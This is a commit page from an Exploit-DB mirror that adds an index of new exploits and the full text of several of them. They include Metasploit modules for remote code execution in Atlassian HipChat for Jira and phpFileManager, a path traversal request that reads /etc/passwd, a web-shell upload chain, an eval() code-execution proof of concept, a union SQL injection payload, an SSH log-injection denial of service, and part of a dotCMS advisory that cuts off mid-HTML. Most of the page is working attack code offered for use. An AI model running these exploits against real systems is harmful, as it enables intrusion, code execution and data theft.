bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-12-09

Browse source 
17 new exploits
This commit is contained in:
Offensive Security 2015-12-09 05:02:11 +00:00
parent cc3cd3f120
commit fa0d0d2907
18 changed files with 1978 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -35143,6 +35143,7 @@ id,file,description,date,author,platform,type,port
38875,platforms/php/webapps/38875.php,"osCMax Arbitrary File Upload and Full Path Information Disclosure Vulnerabilities",2013-12-09,KedAns-Dz,php,webapps,0
38876,platforms/php/webapps/38876.txt,"C2C Forward Auction Creator 2.0 /auction/asp/list.asp pa Parameter SQL Injection",2013-12-16,R3d-D3V!L,php,webapps,0
38877,platforms/php/webapps/38877.txt,"C2C Forward Auction Creator /auction/casp/admin.asp SQL Injection Admin Authentication Bypass",2013-12-16,R3d-D3V!L,php,webapps,0
38878,platforms/windows/dos/38878.txt,"WinAsm Studio 5.1.8.8 - Buffer Overflow Crash PoC",2015-12-06,Un_N0n,windows,dos,0
38879,platforms/asp/webapps/38879.txt,"Etoshop B2B Vertical Marketplace Creator Multiple SQL Injection Vulnerabilities",2013-12-14,R3d-D3V!L,asp,webapps,0
38880,platforms/php/webapps/38880.txt,"Veno File Manager 'q' Parameter Arbitrary File Download Vulnerability",2013-12-11,"Daniel Godoy",php,webapps,0
38881,platforms/php/webapps/38881.html,"Piwigo admin.php User Creation CSRF",2013-12-17,sajith,php,webapps,0
@ -35157,3 +35158,19 @@ id,file,description,date,author,platform,type,port
38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80
38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0
38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection Vulnerability",2015-12-08,LiquidWorm,xml,webapps,0
38898,platforms/xml/webapps/38898.txt,"OpenMRS 2.3 (1.11.4) - Multiple Cross-Site Scripting Vulnerabilities",2015-12-08,LiquidWorm,xml,webapps,0
38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure Vulnerability",2015-12-08,LiquidWorm,xml,webapps,0
38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 Remote Code Execution",2015-12-08,metasploit,php,remote,80
38901,platforms/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80
38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection Vulnerability",2015-12-08,WICS,php,webapps,80
38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0
38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0
38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin Velocity Template Injection",2015-12-08,metasploit,multiple,remote,8080
38906,platforms/php/webapps/38906.txt,"dotCMS 3.2.4 - Multiple Vulnerabilities",2015-12-08,LiquidWorm,php,webapps,80
38907,platforms/php/webapps/38907.txt,"Osclass Multiple Input Validation Vulnerabilities",2013-12-14,R3d-D3V!L,php,webapps,0
38908,platforms/php/webapps/38908.txt,"Leed 'id' Parameter SQL Injection Vulnerability",2013-12-18,"Alexandre Herzog",php,webapps,0
38909,platforms/linux/dos/38909.txt,"DenyHosts 'regex.py' Remote Denial of Service Vulnerability",2013-12-19,"Helmut Grohne",linux,dos,0
38910,platforms/windows/remote/38910.txt,"Hancom Office '.hml' File Processing Heap Buffer Overflow Vulnerability",2013-12-19,diroverflow,windows,remote,0

Can't render this file because it is too large.

7
platforms/linux/dos/38909.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/64478/info
DenyHosts is prone to a remote denial-of-service vulnerability.
Successfully exploiting this issue allows remote attackers to deny further SSH network access to arbitrary IP addresses, denying service to legitimate users.
ssh -l 'Invalid user root from 123.123.123.123' 21.21.21.21

643
platforms/multiple/remote/38905.rb Executable file
View file

@ -0,0 +1,643 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'json'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Atlassian HipChat for Jira Plugin Velocity Template Injection",
'Description' => %q{
Atlassian Hipchat is a web service for internal instant messaging. A plugin is available
for Jira that allows team collibration at real time. A message can be used to inject Java
code into a Velocity template, and gain code exeuction as Jira. Authentication is required
to exploit this vulnerability, and you must make sure the account you're using isn't
protected by captcha. By default, Java payload will be used because it is cross-platform,
but you can also specify which native payload you want (Linux or Windows).
HipChat for Jira plugin versions between 1.3.2 and 6.30.0 are affected. Jira versions
between 6.3.5 and 6.4.10 are also affected by default, because they were bundled with
a vulnerable copy of HipChat.
When using the check command, if you supply a valid username and password, the module
will be able to trigger the bug and check more accurately. If not, it falls back to
passive, which can only tell if the target is running on a Jira version that is bundled
with a vulnerable copy of Hipchat by default, which is less reliable.
This vulnerability was originally discovered internally by Atlassian.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Wood', # PoC
'sinn3r' # Metasploit
],
'References' =>
[
[ 'CVE', '2015-5603' ],
[ 'EDB', '38551' ],
[ 'BID', '76698' ],
[ 'URL', 'https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html' ]
],
'Targets' =>
[
[ 'HipChat for Jira plugin on Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],
[ 'HipChat for Jira plugin on Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],
[ 'HipChat for Jira plugin on Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]
],
'DefaultOptions' =>
{
'RPORT' => 8080
},
'Privileged' => false,
'DisclosureDate' => 'Oct 28 2015',
'DefaultTarget' => 0
))
register_options(
[
# Auth is required, but when we use the check command we allow them to be optional.
OptString.new('JIRAUSER', [false, 'Jira Username', '']),
OptString.new('JIRAPASS', [false, 'Jira Password', '']),
OptString.new('TARGETURI', [true, 'The base to Jira', '/'])
], self.class)
end
# Returns a cookie in a hash, so you can ask for a specific parameter.
#
# @return [Hash]
def get_cookie_as_hash(cookie)
Hash[*cookie.scan(/\s?([^, ;]+?)=([^, ;]*?)[;,]/).flatten]
end
# Checks the target by actually triggering the bug.
#
# @return [Array] Exploit::CheckCode::Vulnerable if bug was triggered.
# Exploit::CheckCode::Unknown if something failed.
# Exploit::CheckCode::Safe for the rest.
def do_explicit_check
begin
cookie = do_login
# I don't really care which command to execute, as long as it's a valid one for both platforms.
# If the command is valid, it should return {"message"=>"0"}.
# If the command is not valid, it should return an empty hash.
c = get_exec_code('whoami')
res = inject_template(c, cookie)
json = res.get_json_document
if json['message'] && json['message'] == '0'
return Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
# Returns the Jira version
#
# @return [String] Found Jira version
# @return [NilClass] No Jira version found.
def get_jira_version
version = nil
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')
})
unless res
vprint_error('Connection timed out while retrieving the Jira version.')
return version
end
metas = res.get_html_meta_elements
version_element = metas.select { |m|
m.attributes['name'] && m.attributes['name'].value == 'ajs-version-number'
}.first
unless version_element
vprint_error('Unable to find the Jira version.')
return version
end
version_element.attributes['content'] ? version_element.attributes['content'].value : nil
end
# Checks the target by looking at things like the Jira version, or whether the Jira web app
# exists or not.
#
# @return [Array] Check code. If the Jira version matches the vulnerable range, it returns
# Exploit::CheckCode::Appears. If we can only tell it runs on Jira, we return
# Exploit::CheckCode::Detected, because it's possible to have Jira not bundled
# with HipChat by default, but installed separately. For other scenarios, we
# return Safe.
def do_passive_check
jira_version = get_jira_version
vprint_status("Found Jira version: #{jira_version}")
if jira_version && jira_version >= '6.3.5' && jira_version < '6.4.11'
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
# Checks the vulnerability. Username and password are required to be able to accurately verify
# the vuln. If supplied, we will try the explicit check (which will trigger the bug, so should
# be more reliable). If not, we will try the passive one (less accurately, but better than
# nothing).
#
# @see #do_explicit_check
# @see #do_passive_check
#
# @return [Array] Check code
def check
checkcode = Exploit::CheckCode::Safe
if jira_cred_empty?
vprint_status("No username and password supplied, so we can only do a passive check.")
checkcode = do_passive_check
else
checkcode = do_explicit_check
end
checkcode
end
# Returns the Jira username set by the user
def jira_username
datastore['JIRAUSER']
end
# Returns the Jira password set by the user
def jira_password
datastore['JIRAPASS']
end
# Reports username and password to the database.
#
# @param opts [Hash]
# @option opts [String] :user
# @option opts [String] :password
#
# @return [void]
def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
private_data: opts[:password],
origin_type: :service,
private_type: :password,
username: opts[:user]
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
last_attempted_at: Time.now
}.merge(service_data)
create_credential_login(login_data)
end
# Returns a valid login cookie.
#
# @return [String]
def do_login
cookie = ''
prerequisites = get_login_prerequisites
xsrf = prerequisites['atlassian.xsrf.token']
sid = prerequisites['JSESSIONID']
uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'headers' => { 'X-Requested-With' => 'XMLHttpRequest' },
'cookie' => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}",
'vars_post' => {
'os_username' => jira_username,
'os_password' => jira_password,
'os_captcha' => '' # Not beatable yet
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while trying to login')
end
json = res.get_json_document
if json.empty?
fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.')
end
if json['loginSucceeded']
cookie = res.get_cookies
elsif !json['loginSucceeded'] && json['captchaFailure']
fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.")
elsif !json['loginSucceeded']
fail_with(Failure::NoAccess, 'Incorrect username or password')
end
report_cred(
user: jira_username,
password: jira_password
)
cookie
end
# Returns login prerequisites
#
# @return [Hash]
def get_login_prerequisites
uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')
res = send_request_cgi({ 'uri' => uri })
unless res
fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites')
end
get_cookie_as_hash(res.get_cookies)
end
# Returns the target platform.
#
# @param cookie [String] Jira cookie
# @return [String]
def get_target_platform(cookie)
c = get_os_detection_code
res = inject_template(c, cookie)
json = res.get_json_document
json['message'] || ''
end
# Returns Java code that can be used to inject to the template in order to write a file.
#
# @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code,
# and then execute the new file instead.
#
# @param fname [String] File to write to.
# @param p [String] Payload
# @return [String]
def get_write_file_code(fname, p)
b64 = Rex::Text.encode_base64(p)
%Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) |
end
# Returns the Java code that gives us the remote Java home path.
#
# @return [String]
def get_java_path_code
get_java_property_code('java.home')
end
# Returns the OS/platform information.
#
# @return [String]
def get_os_detection_code
get_java_property_code('os.name')
end
# Returns the temp path for Java.
#
# @return [String]
def get_temp_path_code
get_java_property_code('java.io.tmpdir')
end
# Returns a system property for Java.
#
# @param prop [String] Name of the property to retrieve.
# @return [String]
def get_java_property_code(prop)
%Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() |
end
# Returns the Java code to execute a jar file.
#
# @param java_path [String] Java home path
# @param war_path [String] The jar file to execute
# @return [String]
def get_jar_exec_code(java_path, war_path)
# A quick way to check platform instead of actually grabbing os.name in Java system properties.
if /^\/[[:print:]]+/ === war_path
normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java')
cmd_str = %Q|#{normalized_java_path} -jar #{war_path}|
else
normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\bin\\java.exe')
war_path.gsub!(/Program Files/, 'PROGRA~1')
cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}"|
end
%Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() |
end
# Returns Java code that can be used to inject to the template in order to execute a file.
#
# @param cmd [String] command to execute
# @return [String]
def get_exec_code(cmd)
%Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() |
end
# Returns Java code that can be used to inject to the template in order to chmod a file.
#
# @param fname [String] File to chmod
# @return [String]
def get_chmod_code(fname)
get_exec_code("chmod 777 #{fname}")
end
# Returns Java code that can be used to inject to the template in order to copy a file.
#
# @note The purpose of this method is to have a file that is not busy, so we can execute it.
# It is meant to be used with #get_write_file_code.
#
# @param fname [String] The file to copy
# @param new_fname [String] The new file
# @return [String]
def get_dup_file_code(fname, new_fname)
if fname =~ /^\/[[:print:]]+/
cp_cmd = "cp #{fname} #{new_fname}"
else
cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}"
end
get_exec_code(cp_cmd)
end
# Returns a boolean indicating whether the module has a username and password.
#
# @return [TrueClass] There is an empty cred.
# @return [FalseClass] No empty cred.
def jira_cred_empty?
jira_username.blank? || jira_password.blank?
end
# Injects Java code to the template.
#
# @param p [String] Code that is being injected.
# @param cookie [String] A cookie that contains a valid JSESSIONID
# @return [void]
def inject_template(p, cookie)
login_sid = get_cookie_as_hash(cookie)['JSESSIONID']
uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render')
uri << '/'
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'cookie' => "JSESSIONID=#{login_sid}",
'ctype' => 'application/json',
'data' => { 'message' => p }.to_json
})
if !res
# This seems to trigger every time even though we're getting a shell. So let's downplay
# this a little bit. At least it's logged to allow the user to debug.
elog('Connection timed out in #inject_template')
elsif res && /Error report/ === res.body
print_error('Failed to inject and execute code:')
vprint_line(res.body)
elsif res
vprint_status("Server response:")
vprint_line res.body
end
res
end
# Checks if the target os/platform is compatible with the module target or not.
#
# @return [TrueClass] Compatible
# @return [FalseClass] Not compatible
def target_platform_compat?(target_platform)
target.platform.names.each do |n|
if /^java$/i === n || /#{n}/i === target_platform
return true
end
end
false
end
# Returns the normalized file path for payload.
#
# @return [String]
def normalize_payload_fname(tmp_path, fname)
# A quick way to check platform insteaf of actually grabbing os.name in Java system properties.
if /^\/[[:print:]]+/ === tmp_path
Rex::FileUtils.normalize_unix_path(tmp_path, fname)
else
Rex::FileUtils.normalize_win_path(tmp_path, fname)
end
end
# Returns a temp path from the remote target.
#
# @param cookie [String] Jira cookie
# @return [String]
def get_tmp_path(cookie)
c = get_temp_path_code
res = inject_template(c, cookie)
json = res.get_json_document
json['message'] || ''
end
# Returns the Java home path used by Jira.
#
# @param cookie [String] Jira cookie.
# @return [String]
def get_java_home_path(cookie)
c = get_java_path_code
res = inject_template(c, cookie)
json = res.get_json_document
json['message'] || ''
end
# Exploits the target in Java platform.
#
# @return [void]
def exploit_as_java(cookie)
tmp_path = get_tmp_path(cookie)
if tmp_path.blank?
fail_with(Failure::Unknown, 'Unable to get the temp path.')
end
jar_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar")
jar = payload.encoded_jar
java_home = get_java_home_path(cookie)
register_files_for_cleanup(jar_fname)
if java_home.blank?
fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')
else
print_status("Found Java home path: #{java_home}")
end
print_status("Attempting to write #{jar_fname}")
c = get_write_file_code(jar_fname, jar)
inject_template(c, cookie)
print_status("Executing #{jar_fname}")
c = get_jar_exec_code(java_home, jar_fname)
inject_template(c, cookie)
end
# Exploits the target in Windows platform.
#
# @return [void]
def exploit_as_windows(cookie)
tmp_path = get_tmp_path(cookie)
if tmp_path.blank?
fail_with(Failure::Unknown, 'Unable to get the temp path.')
end
exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe")
exe_fname.gsub!(/Program Files/, 'PROGRA~1')
exe_new_fname.gsub!(/Program Files/, 'PROGRA~1')
register_files_for_cleanup(exe_fname, exe_new_fname)
print_status("Attempting to write #{exe_fname}")
c = get_write_file_code(exe_fname, exe)
inject_template(c, cookie)
print_status("New file will be #{exe_new_fname}")
c = get_dup_file_code(exe_fname, exe_new_fname)
inject_template(c, cookie)
print_status("Executing #{exe_new_fname}")
c = get_exec_code(exe_new_fname)
inject_template(c, cookie)
end
# Exploits the target in Linux platform.
#
# @return [void]
def exploit_as_linux(cookie)
tmp_path = get_tmp_path(cookie)
if tmp_path.blank?
fail_with(Failure::Unknown, 'Unable to get the temp path.')
end
fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))
new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))
register_files_for_cleanup(fname, new_fname)
print_status("Attempting to write #{fname}")
p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform)
c = get_write_file_code(fname, p)
inject_template(c, cookie)
print_status("chmod +x #{fname}")
c = get_exec_code("chmod 777 #{fname}")
inject_template(c, cookie)
print_status("New file will be #{new_fname}")
c = get_dup_file_code(fname, new_fname)
inject_template(c, cookie)
print_status("Executing #{new_fname}")
c = get_exec_code(new_fname)
inject_template(c, cookie)
end
def exploit
if jira_cred_empty?
fail_with(Failure::BadConfig, 'Jira username and password are required.')
end
print_status("Attempting to login as #{jira_username}:#{jira_password}")
cookie = do_login
print_good("Successfully logged in as #{jira_username}")
target_platform = get_target_platform(cookie)
print_status("Target being detected as: #{target_platform}")
unless target_platform_compat?(target_platform)
fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')
end
case target.name
when /java$/i
exploit_as_java(cookie)
when /windows$/i
exploit_as_windows(cookie)
when /linux$/i
exploit_as_linux(cookie)
end
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
end

115
platforms/php/remote/38900.rb Executable file
View file

@ -0,0 +1,115 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'phpFileManager 0.9.8 Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in phpFileManager
0.9.8 which is a filesystem management tool on a single file.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hyp3rlinx', # initial discovery
'Jay Turla' # msf
],
'References' =>
[
[ 'EDB', '37709' ],
[ 'URL', 'http://phpfm.sourceforge.net/' ] # Official Website
],
'Privileged' => false,
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Platform' => %w{ unix win },
'Arch' => ARCH_CMD,
'Targets' =>
[
['phpFileManager / Unix', { 'Platform' => 'unix' } ],
['phpFileManager / Windows', { 'Platform' => 'win' } ]
],
'DisclosureDate' => 'Aug 28 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path of phpFileManager', '/phpFileManager-0.9.8/index.php']),
],self.class)
end
def check
txt = Rex::Text.rand_text_alpha(8)
res = http_send_command("echo #{txt}")
if res && res.body =~ /#{txt}/
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def push
uri = normalize_uri(target_uri.path)
# To push the Enter button
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'frame' => '3',
'pass' => '' # yep this should be empty
}
})
if res.nil?
vprint_error("#{peer} - Connection timed out")
fail_with(Failure::Unknown, "Failed to trigger the Enter button")
end
if res && res.headers && res.code == 302
print_good("#{peer} - Logged in to the file manager")
cookie = res.get_cookies
cookie
else
fail_with(Failure::Unknown, "#{peer} - Error entering the file manager")
end
end
def http_send_command(cmd)
cookie = push
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path),
'cookie' => cookie,
'vars_get' => {
'action' => '6',
'cmd' => cmd
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, "Failed to execute the command.")
end
res
end
def exploit
http_send_command(payload.encoded)
end
end

124
platforms/php/webapps/38895.txt Executable file
View file

@ -0,0 +1,124 @@
# Exploit Title: SIMOGEO FileManager 2.3.0 - Path Traversal Vulnerability
# Date: 2015-12-09
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: https://github.com/simogeo/Filemanager
# Software Link: git clone http://github.com/simogeo/Filemanager.git
# Version: 2.3.0
# Tested on: Debian [Wheezy]
# CVE : none
Path Traversal Code
http://192.168.0.15/vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd
Filtering Rules: "../" -> blank
Bypass Filtering : ....// -> deleted "../" -> ../
Attack Request
GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=preview&path=//....//....//....//....//....//....//....//....//....//etc/passwd HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Response
HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 17:18:52 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze19
Content-Transfer-Encoding: Binary
Content-Length: 1383
Content-Disposition: inline; filename="passwd"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
..snip..
###################################################
# Exploit Title: SIMOGEO FileManager 2.3.0 - File Upload Vulnerability
# Date: 2015-12-09
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: https://github.com/simogeo/Filemanager
# Software Link: git clone http://github.com/simogeo/Filemanager.git
# Version: 2.3.0
# Tested on: Debian [Wheezy]
# CVE : none
1. Upload File
POST /vul_test/target/Filemanager/connectors/php/filemanager.php?config=filemanager.config.js HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: application/json
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.15/vul_test/target/Filemanager/
Content-Length: 520
Content-Type: multipart/form-data; boundary=---------------------------1675330531498115896355630737
Connection: keep-alive
Pragma: no-cache
-----------------------------1675330531498115896355630737
Content-Disposition: form-data; name="mode"
add
-----------------------------1675330531498115896355630737
Content-Disposition: form-data; name="currentpath"
/vul_test/target/Filemanager/userfiles/
-----------------------------1675330531498115896355630737
Content-Disposition: form-data; name="newfile"; filename="shell.txt"
Content-Type: text/plain
echo "Write PHP WebShell Code";
<html><body><script>alert("45")</script></body></html>
-----------------------------1675330531498115896355630737--
2. Change File Extension(.txt -> .php or .html) & Upload Path Tampering(/userfiles -> /)
GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=rename&old=%2Fvul_test%2Ftarget%2FFilemanager%2Fuserfiles%2Fshell.txt&new=....//shell.php&config=filemanager.config.js HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.15/vul_test/target/Filemanager/
Connection: keep-alive
3. Call Uploaded File
http://192.168.0.15/vul_test/target/Filemanager/userfiles/shell.php
Response
HTTP/1.1 200 OK
Date: Tue, 08 Dec 2015 17:25:20 GMT
Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze19
Vary: Accept-Encoding
Content-Length: 32
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
echo "Write PHP WebShell Code";
<html><body><script>alert("45")</script></body></html>

28
platforms/php/webapps/38901.txt Executable file
View file

@ -0,0 +1,28 @@
Exploit Title : PHP utility belt Remote Code Execution vulnerability
Author : WICS
Date : 8/12/2015
Software Link : https://github.com/mboynes/php-utility-belt
Overview:
PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.
ajax.php is accessible without any authentication
Vulnerable code (Line number 12 to 15)
if ( isset( $_POST['code'] ) ) {
if ( false === eval( $_POST['code'] ) )
echo 'PHP Error encountered, execution halted';
}
POC
Access URL
http://127.0.0.1/php-utility-belt/ajax.php
in Post data type
code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');
above code will generate info.php file which will display php info
Shell link will be
http://127.0.0.1/php-utility-belt/info.php

29
platforms/php/webapps/38902.txt Executable file
View file

@ -0,0 +1,29 @@
Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability
Author : WICS
Date : 7/12/2015
Software Link : https://wordpress.org/plugins/polls-widget/
Affected Version: 1.0.7 and below
Overview:
Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll.
This plugin has 2000+ active installations.
Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id
line no. 36 $question_id=$_POST['question_id'];
....
....
line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A);
print_r(json_encode($answer, JSON_FORCE_OBJECT));
this script is vulnerable to union based sql injection with column count 2
POC
http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues
in post data, add this
question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5

120
platforms/php/webapps/38906.txt Executable file
View file

@ -0,0 +1,120 @@

dotCMS 3.2.4 Multiple Vulnerabilities
Vendor: dotCMS Software, LLC
Product web page: http://www.dotcms.com
Affected version: 3.2.4 (Enterprise)
Summary: DotCMS is the next generation of Content Management System (CMS).
Quick to deploy, open source, Java-based, open APIs, extensible and massively
scalable, dotCMS can rapidly deliver personalized, engaging multi-channel
sites, web apps, campaigns, one-pagers, intranets - all types of content
driven experiences - without calling in your developers.
Desc: The application suffers from multiple security vulnerabilities including:
Open Redirection, multiple Stored and Reflected XSS and Cross-Site Request
Forgery (CSRF).
Tested on: Apache-Coyote/1.1
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5290
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php
Vendor: http://dotcms.com/docs/latest/change-log
https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305
https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3
19.11.2015
--
1. Open Redirect via '_EXT_LANG_redirect' GET parameter:
--------------------------------------------------------
http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia
2. CSRF Add Admin:
------------------
<html>
<body>
